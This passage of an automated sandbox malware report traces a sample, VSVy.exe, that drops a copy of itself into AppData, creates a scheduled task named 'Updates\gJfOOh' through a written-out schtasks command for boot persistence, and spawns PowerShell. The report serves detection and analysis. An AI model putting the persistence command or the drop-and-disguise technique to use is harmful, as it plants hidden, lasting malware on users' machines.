              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, Rw6U9HoytPh3C58fNu.csHigh entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'
              Source: C:\Users\user\Desktop\VSVy.exeFile created: C:\Users\user\AppData\Roaming\gJfOOh.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
